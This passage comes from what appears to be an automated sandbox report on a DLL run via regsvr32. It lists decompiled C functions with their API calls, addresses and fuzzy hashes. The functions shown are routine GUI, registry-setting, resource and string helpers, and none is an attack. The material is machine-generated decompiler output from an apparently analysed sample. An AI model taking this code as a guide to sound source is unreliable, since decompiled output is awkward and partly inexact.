						_t16 = _t10;
						if(_t16 == 0) {
							goto L10;
						}
						_t10 = E10022422(_t13, _t16, _a8, _a12);
						if(_t10 == 0) {
							_t10 = GetWindow(_t16, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t15) == 0) {
						L3:
						_push(_t15);
						if(_a12 == 0) {
							return E100220EE(_t17);
						}
						_t10 = E10022115();
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10022422(_t13, _t15, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}









                                                                                                            0x10022422
                                                                                                            0x10022439
                                                                                                            0x1002243d
                                                                                                            0x1002246d
                                                                                                            0x10022470
                                                                                                            0x1002248d
                                                                                                            0x1002248d
                                                                                                            0x10022491
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002247b
                                                                                                            0x10022482
                                                                                                            0x10022487
                                                                                                            0x00000000
                                                                                                            0x10022487
                                                                                                            0x00000000
                                                                                                            0x10022482
                                                                                                            0x1002243f
                                                                                                            0x10022444
                                                                                                            0x10022456
                                                                                                            0x1002245a
                                                                                                            0x1002245b
                                                                                                            0x00000000
                                                                                                            0x1002245d
                                                                                                            0x10022464
                                                                                                            0x1002246b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022446
                                                                                                            0x1002244d
                                                                                                            0x10022454
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022454
                                                                                                            0x10022444
                                                                                                            0x10022496
                                                                                                            0x10022496

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 1002242D
                                                                                                            • GetTopWindow.USER32(00000000), ref: 10022440
                                                                                                              • Part of subcall function 10022422: GetWindow.USER32(00000000,00000002), ref: 10022487
                                                                                                            • GetTopWindow.USER32(?), ref: 10022470
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item
                                                                                                            • String ID:
                                                                                                            • API String ID: 369458955-0
                                                                                                            • Opcode ID: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                                                            • Instruction ID: cbb5f4ea75b5981124a7b3c1720515b8597a7f038d3602274fac482962cbe2a9
                                                                                                            • Opcode Fuzzy Hash: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                                                            • Instruction Fuzzy Hash: A701623650166BBBDB23BFE2BC00E9F3B99EF462E4F828121FD0499111D731D9629691
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002B47F Relevance: 6.0, APIs: 4, Instructions: 48registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B47F(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
				intOrPtr _v8;
				char _v24;
				intOrPtr _t15;
				long _t22;
				void* _t31;
				void* _t32;

				_t15 =  *0x1004c470; // 0xf3933a06
				_t31 = __ecx;
				_v8 = _t15;
				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					wsprintfA( &_v24, 0x1003cc28, _a12);
					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
				} else {
					_t32 = E10035959(__ecx, _a4);
					if(_t32 != 0) {
						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
						RegCloseKey(_t32);
						_t19 = 0 | _t22 == 0x00000000;
					}
				}
				return E100117AE(_t19, _v8);
			}









                                                                                                            0x1002b485
                                                                                                            0x1002b48b
                                                                                                            0x1002b491
                                                                                                            0x1002b494
                                                                                                            0x1002b4d8
                                                                                                            0x1002b4ee
                                                                                                            0x1002b496
                                                                                                            0x1002b49e
                                                                                                            0x1002b4a2
                                                                                                            0x1002b4b3
                                                                                                            0x1002b4bc
                                                                                                            0x1002b4c6
                                                                                                            0x1002b4c9
                                                                                                            0x1002b4a2
                                                                                                            0x1002b4fe

                                                                                                            APIs
                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002B4B3
                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?), ref: 1002B4BC
                                                                                                            • wsprintfA.USER32 ref: 1002B4D8
                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B4EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1902064621-0
                                                                                                            • Opcode ID: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                                                            • Instruction ID: 9a6bc9ffc77bb201adb5d4a8a8e7071db867b7f7a5a0f8b8952f6efe61c2a51a
                                                                                                            • Opcode Fuzzy Hash: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                                                            • Instruction Fuzzy Hash: A001403250161AEFDB02EFA5CD45E9E3BB8FF44754F044415FA04EB152DB71DA118B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10031D85 Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10031D85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				char _v268;
				int _v272;
				void* __ebp;
				intOrPtr _t14;
				int _t24;
				intOrPtr* _t30;
				void* _t33;

				_t14 =  *0x1004c470; // 0xf3933a06
				_v8 = _t14;
				E100220EE(_t33, SetActiveWindow( *(__ecx + 0x1c)));
				_t24 = 0;
				_v272 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
				_t30 =  *((intOrPtr*)(E100373B5() + 4));
				if(_v272 > 0) {
					do {
						DragQueryFileA(_a4, _t24,  &_v268, 0x104);
						_t18 =  *((intOrPtr*)( *_t30 + 0x88))( &_v268);
						_t24 = _t24 + 1;
					} while (_t24 < _v272);
				}
				DragFinish(_a4);
				return E100117AE(_t18, _v8);
			}











                                                                                                            0x10031d8e
                                                                                                            0x10031d99
                                                                                                            0x10031da3
                                                                                                            0x10031dae
                                                                                                            0x10031db9
                                                                                                            0x10031dca
                                                                                                            0x10031dcd
                                                                                                            0x10031dcf
                                                                                                            0x10031ddf
                                                                                                            0x10031dec
                                                                                                            0x10031df2
                                                                                                            0x10031df3
                                                                                                            0x10031dcf
                                                                                                            0x10031dfe
                                                                                                            0x10031e10

                                                                                                            APIs
                                                                                                            • SetActiveWindow.USER32(?), ref: 10031D9C
                                                                                                            • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10031DB7
                                                                                                            • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 10031DDF
                                                                                                            • DragFinish.SHELL32(?), ref: 10031DFE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 892977027-0
                                                                                                            • Opcode ID: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                                                            • Instruction ID: f3efa9f330312ec6ab61e1b0fbe20e019f1dfd30d235b1af0ecd9192f479495c
                                                                                                            • Opcode Fuzzy Hash: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                                                            • Instruction Fuzzy Hash: A2016975900228AFDB11DF64CC84DE97BB8EF49354F0081AAF5859B151CA70AE81CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100368F3 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100368F3(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0xa8) = _a4;
					 *(_t37 + 0xac) = _a8;
					 *(_t37 + 0xa0) = _a12;
					_t21 = _a16;
					 *(_t37 + 0xa4) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}





                                                                                                            0x100368f7
                                                                                                            0x10036904
                                                                                                            0x10036954
                                                                                                            0x1003695d
                                                                                                            0x10036966
                                                                                                            0x1003696c
                                                                                                            0x1003696f
                                                                                                            0x00000000
                                                                                                            0x1003696f
                                                                                                            0x10036925
                                                                                                            0x1003693f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$InvalidateRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3225880595-0
                                                                                                            • Opcode ID: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                                                            • Instruction ID: 4b04fdd573aa0d80c43ff6d8227c2b4f41099026dca325be7ad292e47659670a
                                                                                                            • Opcode Fuzzy Hash: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                                                            • Instruction Fuzzy Hash: 7E015E70200718AFE7218F19DC45FAABBF8EF45751F10842AFD95DA190D6B0F850DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10036FD8 Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E10036FD8(short* _a4) {
				char* _v0;
				int _v8;
				char* _v16;
				int _t6;
				char* _t7;
				short* _t11;
				void* _t12;
				void* _t16;
				int _t17;

				_t11 = _a4;
				if(_t11 != 0) {
					__imp__#7(_t11, _t12, _t16);
					_t17 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_v16 = _t7;
					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
					return _v16;
				}
				return 0;
			}












                                                                                                            0x10036fda
                                                                                                            0x10036fe3
                                                                                                            0x10036fec
                                                                                                            0x10036ffc
                                                                                                            0x10037002
                                                                                                            0x10037006
                                                                                                            0x1003700a
                                                                                                            0x10037016
                                                                                                            0x1003701f
                                                                                                            0x00000000
                                                                                                            0x10037026
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SysStringLen.OLEAUT32(?), ref: 10036FEC
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10039361,00000000), ref: 10037002
                                                                                                            • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1003700A
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,10039361,00000000), ref: 1003701F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3384502665-0
                                                                                                            • Opcode ID: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                                                            • Instruction ID: 594c1e5c48785cf97723a890a7a01ae096917330bd715e74928d8e18aa0a9d1e
                                                                                                            • Opcode Fuzzy Hash: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                                                            • Instruction Fuzzy Hash: 98F030721062387F92219B679C88CABBFDCFE8B2A5B014919F548C2101C2259901CBF1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10036B96 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10036B96(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E1002F372(__ecx, _t19, _a8);
				_t12 = E100202AB(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}










                                                                                                            0x10036b9d
                                                                                                            0x10036ba4
                                                                                                            0x10036ba7
                                                                                                            0x10036bae
                                                                                                            0x10036bb6
                                                                                                            0x10036bc2
                                                                                                            0x10036bca
                                                                                                            0x10036bdc
                                                                                                            0x10036bea
                                                                                                            0x10036bf8
                                                                                                            0x10036bfc
                                                                                                            0x00000000
                                                                                                            0x10036bff
                                                                                                            0x10036bca
                                                                                                            0x10036c03

                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetParent.USER32(?), ref: 10036BBB
                                                                                                            • IsZoomed.USER32(00000000), ref: 10036BC2
                                                                                                            • GetSystemMetrics.USER32 ref: 10036BEA
                                                                                                            • GetSystemMetrics.USER32 ref: 10036BF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem$LongParentWindowZoomed
                                                                                                            • String ID:
                                                                                                            • API String ID: 3909876373-0
                                                                                                            • Opcode ID: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                                                            • Instruction ID: 7d4475de74911b0f59ada56c103e3f3b6aae8d9b3b29eeb5a8f877c48aa9be1b
                                                                                                            • Opcode Fuzzy Hash: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                                                            • Instruction Fuzzy Hash: 3801A736A00214AFDB11ABB9DC49F59BBA8EF44740F018119FA45EB191D670B904CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000BFC5 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1000BFC5(intOrPtr _a4, RECT* _a8, int _a12) {
				struct tagRECT _v20;
				intOrPtr _t28;

				_t28 = _a4;
				if(_a8 != 0) {
					IntersectRect( &_v20, _a8, _t28 - 0x9c);
					EqualRect( &_v20, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v20) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
				}
				return 0;
			}





                                                                                                            0x1000bfd0
                                                                                                            0x1000bfd3
                                                                                                            0x1000bff6
                                                                                                            0x1000c003
                                                                                                            0x1000bfd5
                                                                                                            0x1000bfe0
                                                                                                            0x1000bfe1
                                                                                                            0x1000bfe2
                                                                                                            0x1000bfe3
                                                                                                            0x1000bfe5
                                                                                                            0x1000c015
                                                                                                            0x1000c02a
                                                                                                            0x1000c02a
                                                                                                            0x1000c034

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                            • String ID:
                                                                                                            • API String ID: 3354205298-0
                                                                                                            • Opcode ID: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                                                            • Instruction ID: 1e794ae20577572ca79bd181089135021f598cd57710f0e7593056f93d140995
                                                                                                            • Opcode Fuzzy Hash: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                                                            • Instruction Fuzzy Hash: 1601E57290022EEFEF01DFA5CC88EAAB7ADFB09254F018865E914DB115D231E5198B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100214B2 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100214B2(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029A8E(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}







                                                                                                            0x100214bc
                                                                                                            0x10021521
                                                                                                            0x00000000
                                                                                                            0x100214c4
                                                                                                            0x100214c4
                                                                                                            0x100214ca
                                                                                                            0x00000000
                                                                                                            0x100214e7
                                                                                                            0x100214f0
                                                                                                            0x100214fc
                                                                                                            0x10021502
                                                                                                            0x10021508
                                                                                                            0x1002150c
                                                                                                            0x1002150c
                                                                                                            0x10021516
                                                                                                            0x00000000
                                                                                                            0x1002151e
                                                                                                            0x100214ca

                                                                                                            APIs
                                                                                                            • GetObjectA.GDI32(00000000,0000000C,?), ref: 100214F0
                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 100214FC
                                                                                                            • GetSysColor.USER32(00000008), ref: 1002150C
                                                                                                            • SetTextColor.GDI32(00000000,?), ref: 10021516
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$LongObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2871169696-0
                                                                                                            • Opcode ID: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                                                            • Instruction ID: 07a055e2fde14eb44e4b892d4051d3cd351fecf6f4b2367e44398545aae672e6
                                                                                                            • Opcode Fuzzy Hash: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                                                            • Instruction Fuzzy Hash: 0301283A900529EBEB429FA0EC85AEB3BA4EB55291F908560FD13C40A1C730CD90DB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002415A Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002415A(void* __ecx, CHAR* _a4) {
				void* __edi;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				struct HINSTANCE__* _t16;
				void* _t17;

				_t14 = 0;
				_t11 = 0;
				_t17 = __ecx;
				if(_a4 == 0) {
					L4:
					_t15 = E100232BF(_t17, _t14, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t15;
				}
				_t16 =  *(E100373B5() + 0xc);
				_t8 = FindResourceA(_t16, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t16, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}











                                                                                                            0x1002415e
                                                                                                            0x10024160
                                                                                                            0x10024166
                                                                                                            0x10024168
                                                                                                            0x1002419d
                                                                                                            0x100241a7
                                                                                                            0x100241a9
                                                                                                            0x100241b0
                                                                                                            0x100241b0
                                                                                                            0x00000000
                                                                                                            0x100241b6
                                                                                                            0x1002416f
                                                                                                            0x1002417c
                                                                                                            0x10024184
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10024188
                                                                                                            0x1002418e
                                                                                                            0x10024192
                                                                                                            0x1002419b
                                                                                                            0x00000000
                                                                                                            0x1002419b
                                                                                                            0x100241bc

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002417C
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024188
                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024195
                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 100241B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                                                            • Instruction ID: fdd0e0ea882c3c69c4099ed456d0cfd7dce8bbf4e7d741b6fad66cb09ea4bd77
                                                                                                            • Opcode Fuzzy Hash: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                                                            • Instruction Fuzzy Hash: 40F0903A2412256FD3029FA65C88D3FB6FDEFB59E6B424038FD05D6212DE209C5587A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002095F Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1002095F(void* __ecx) {
				int _t26;
				int _t28;
				void* _t41;

				E10011BF0(0x1003a4d8, _t41);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
